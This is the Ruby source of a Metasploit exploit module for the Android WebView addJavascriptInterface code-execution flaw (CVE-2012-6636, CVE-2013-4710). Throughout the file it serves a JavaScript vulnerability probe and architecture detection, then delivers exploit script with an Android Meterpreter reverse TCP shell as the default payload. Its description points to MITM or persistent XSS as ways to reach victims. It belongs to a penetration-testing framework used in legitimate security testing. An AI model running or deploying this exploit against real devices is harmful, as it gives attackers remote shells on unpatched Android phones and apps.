GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/android/browser/webview_addjavascriptinterface.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::Remote::BrowserAutopwn
  include Msf::Exploit::Android

  # Client-side vulnerability probe run by the browser exploit server (and by
  # BrowserAutopwn, see autopwn_info below) before anything else is served.
  # It walks every property of the top window looking for an injected Java
  # bridge object: if `getClass().forName('java.lang.Runtime')` succeeds, the
  # object exposes Java reflection and the page sets is_vuln. Properties that
  # are not Java bridges throw and are skipped by the empty catch, so a clean
  # page simply never sets is_vuln.
  VULN_CHECK_JS = %Q|
    for (i in top) {
      try {
        top[i].getClass().forName('java.lang.Runtime');
        is_vuln = true; break;
      } catch(e) {}
    }
  |

  # Registration with BrowserAutopwn: only Android clients are matched, the
  # module is flagged as needing JavaScript, and VULN_CHECK_JS doubles as the
  # autopwn vulnerability test.
  autopwn_info(
    :os_name => OperatingSystems::Match::ANDROID,
    :arch => ARCH_ARMLE,
    :javascript => true,
    :rank => ExcellentRanking,
    :vuln_test => VULN_CHECK_JS
  )

  # Module metadata.
  #
  # BrowserRequirements restricts the exploit server to Android clients and
  # reuses VULN_CHECK_JS as the per-client test; :vuln_test_error is the text
  # reported when that test does not set is_vuln.
  #
  # @param info [Hash] metadata overrides merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Android Browser and WebView addJavascriptInterface Code Execution',
      'Description' => %q{
        This module exploits a privilege escalation issue in Android < 4.2's WebView component
        that arises when untrusted Javascript code is executed by a WebView that has one or more
        Interfaces added to it. The untrusted Javascript code can call into the Java Reflection
        APIs exposed by the Interface and execute arbitrary commands.

        Some distributions of the Android Browser app have an addJavascriptInterface
        call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs
        4.1.2 release of Android is known to be vulnerable.

        A secondary attack vector involves the WebViews embedded inside a large number
        of Android applications. Ad integrations are perhaps the worst offender here.
        If you can MITM the WebView's HTTP connection, or if you can get a persistent XSS
        into the page displayed in the WebView, then you can inject the html/js served
        by this module and get a shell.

        Note: Adding a .js to the URL will return plain javascript (no HTML markup).
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'jduck', # original msf module
        'joev' # static server
      ],
      'References' => [
        ['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/'],
        ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
        ['URL', 'http://50.56.33.56/blog/?p=314'],
        ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'],
        ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'],
        ['CVE', '2012-6636'], # original CVE for addJavascriptInterface
        ['CVE', '2013-4710'], # native browser addJavascriptInterface (searchBoxJavaBridge_)
        ['EDB', '31519'],
        ['OSVDB', '97520']
      ],
      'Platform' => ['android', 'linux'],
      'Arch' => [ARCH_DALVIK, ARCH_X86, ARCH_ARMLE, ARCH_MIPSLE],
      'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' },
      'Targets' => [ [ 'Automatic', {} ] ],
      'DisclosureDate' => '2012-12-21',
      'DefaultTarget' => 0,
      'BrowserRequirements' => {
        :source => 'script',
        :os_name => OperatingSystems::Match::ANDROID,
        :vuln_test => VULN_CHECK_JS,
        :vuln_test_error => 'No vulnerable Java objects were found in this web context.'
      }
    ))

    # The JsObfuscate option is removed from this module. The file does not
    # record why; NOTE(review): presumably because the static .js route has
    # to serve the script unchanged — confirm before re-enabling it.
    deregister_options('JsObfuscate')
  end

  # Hooked to prevent BrowserExploitServer from attempting to do JS detection
  # on requests for the static javascript file.
  #
  # Requests whose URI contains ".js" are answered directly by
  # serve_static_js; everything else goes through the mixin's normal
  # detection flow via super.
  #
  # NOTE(review): the /\.js/ match is unanchored, so any URI containing
  # ".js" anywhere (e.g. "/data.json") is also routed to serve_static_js
  # rather than to super — confirm that is intended.
  #
  # @param cli the connected client
  # @param req the parsed HTTP request; only req.uri is consulted here
  def on_request_uri(cli, req)
    if req.uri =~ /\.js/
      serve_static_js(cli, req)
    else
      super
    end
  end

  # The browser appears to be vulnerable, serve the exploit.
  #
  # The architecture reported by browser detection is passed through
  # normalize_arch before the page is built, so an unknown value falls back
  # to DEFAULT_ARCH rather than being used as-is.
  #
  # @param cli the connected client
  # @param req the parsed HTTP request (unused here)
  # @param browser [Hash] detection results; :arch is the only key read
  def on_request_exploit(cli, req, browser)
    arch = normalize_arch(browser[:arch])
    print_status "Serving #{arch} exploit..."
    send_response_html(cli, html(arch))
  end

  # Called when a client requests a .js route.
  # This is handy for post-XSS.
  #
  # Two responses are possible, both sent as text/javascript:
  # - with an `arch` query parameter: the exploit script for that
  #   architecture. The client-supplied value is untrusted; it is run
  #   through normalize_arch (whitelist against SUPPORTED_ARCHES) before it
  #   is logged or used to select the script.
  # - without one: the small arch-detection script from
  #   static_arch_detect_js, which loads the right file on the client side.
  #
  # @param cli the connected client
  # @param req the parsed HTTP request; req.qstring['arch'] is read
  def serve_static_js(cli, req)
    arch = req.qstring['arch']
    response_opts = { 'Content-type' => 'text/javascript' }

    if arch.present?
      print_status("Serving javascript for arch #{normalize_arch arch}")
      send_response(cli, add_javascript_interface_exploit_js(normalize_arch arch), response_opts)
    else
      print_status("Serving arch detection javascript")
      send_response(cli, static_arch_detect_js, response_opts)
    end
  end

  # This is served to requests for the static .js file.
  # Because we have to use javascript to detect arch, we have 3 different
  # versions of the static .js file (x86/mips/arm) to choose from. This
  # small snippet of js detects the arch and requests the correct file.
  #
  # navigator.platform is matched against one regex per supported arch
  # (arm/mips/x86, case-insensitive); the first hit wins. The follow-up
  # request uses a random 5-letter file name ending in ".js" so that
  # on_request_uri routes it back to serve_static_js, with the detected
  # arch in the query string. Insertion is delayed by 100ms so that
  # document.body (or document.head) exists when the script tag is added.
  #
  # Note that if no regex matches, the snippet loads nothing: the
  # DEFAULT_ARCH fallback in normalize_arch only applies once a request
  # with an `arch` parameter reaches the server.
  #
  # @return [String] javascript that detects the arch and loads the script
  def static_arch_detect_js
    %Q|
      var arches = {};
      arches['#{ARCH_ARMLE}'] = /arm/i;
      arches['#{ARCH_MIPSLE}'] = /mips/i;
      arches['#{ARCH_X86}'] = /x86/i;

      var arch = null;
      for (var name in arches) {
        if (navigator.platform.toString().match(arches[name])) {
          arch = name;
          break;
        }
      }

      if (arch) {
        // load the script with the correct arch
        var script = document.createElement('script');
        script.setAttribute('src', '#{get_uri}/#{Rex::Text::rand_text_alpha(5)}.js?arch='+arch);
        script.setAttribute('type', 'text/javascript');

        // ensure body is parsed and we won't be in an uninitialized state
        setTimeout(function(){
          var node = document.body \|\| document.head;
          node.appendChild(script);
        }, 100);
      }
    |
  end

  # Whitelists an architecture string against the supported set.
  #
  # This is the only validation applied to the client-supplied `arch`
  # value from serve_static_js and to browser[:arch] in on_request_exploit.
  # SUPPORTED_ARCHES and DEFAULT_ARCH are not defined in this file;
  # NOTE(review): presumably they come from Msf::Exploit::Android — confirm.
  #
  # @param arch [String] architecture name as reported by the client
  # @return [String] normalized client architecture: `arch` itself when it
  #   is listed in SUPPORTED_ARCHES, otherwise DEFAULT_ARCH
  def normalize_arch(arch)
    if SUPPORTED_ARCHES.include?(arch) then arch else DEFAULT_ARCH end
  end

  # Wraps the exploit javascript for `arch` in a minimal HTML document.
  #
  # @param arch [String] an already-normalized architecture name
  # @return [String] complete HTML page with the script inline
  def html(arch)
    "<!doctype html><html><body><script>#{add_javascript_interface_exploit_js(arch)}</script></body></html>"
  end
end